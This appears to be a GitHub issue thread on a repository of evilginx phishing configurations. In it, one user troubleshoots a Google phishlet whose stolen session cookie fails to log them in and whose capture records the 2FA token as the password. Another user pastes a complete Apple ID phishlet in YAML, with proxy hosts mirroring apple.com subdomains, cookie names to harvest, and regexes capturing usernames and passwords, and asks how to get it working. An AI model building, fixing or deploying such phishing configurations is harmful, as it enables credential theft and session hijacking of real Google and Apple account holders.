### ISSUE TITLE
Google session cookie

### ISSUE THREAD

**Issue by github-n00b** [asmc/evilginxPhishlets#1]
Nice work on this!
The google settings seem to work for the most part, but I haven't got the imported session cookie to log me in. Also I don't know if it's related to the settings or to evilginx itself, but the 2fa token gets registered as the password as well, overwriting the actual password.

**Comment by acnt4201** [comment]
how to make for other like apple or whatever site..  i try but not working so. 

name: 'apple'
author: '@d3si'
min_ver: '2.1.0'
proxy_hosts:
  - {phish_sub: 'appleid', orig_sub: 'appleid', domain: 'apple.com', session: true, is_landing: true}
  - {phish_sub: 'idmsa', orig_sub: 'idmsa', domain: 'apple.com', session: true, is_landing: false}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'apple.com', session: true, is_landing: false}
  - {phish_sub: 'appleid', orig_sub: 'appleid', domain: 'cdn-apple', session: true, is_landing: false}
 
sub_filters:
  - {hostname: 'appleid.apple.com', sub: 'appleid', domain: 'apple.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
  - {hostname: 'idmsa.apple.com', sub: 'idmsa', domain: 'apple.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
  - {hostname: 'www.apple.com', sub: 'www', domain: 'apple.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
  - {hostname: 'appleid.cdn-apple.com', sub: 'appleid', domain: 'cdn-apple.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}

auth_tokens:
  - domain: 'apple.com'
    keys: ['s_fid','s_ptc','s_pathLength','s_cc','ccl','s_vi','geo']
user_regex:
  key: 'accountName'
  re: '(.*)'
pass_regex:
  key: 'password'
  re: '(.*)'
landing_path:
  - '/#!&page=signin'
